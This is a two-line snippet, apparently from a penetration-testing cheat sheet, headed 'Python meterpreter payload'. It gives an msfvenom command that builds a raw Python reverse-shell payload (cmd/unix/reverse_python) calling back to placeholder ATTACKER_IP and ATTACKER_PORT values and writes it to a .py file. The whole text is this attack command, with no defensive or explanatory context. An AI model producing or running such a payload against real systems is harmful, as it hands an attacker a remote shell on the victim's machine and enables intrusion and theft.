# Python meterpreter payload
#
msfvenom -p cmd/unix/reverse_python \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f raw -o ${NAME}.py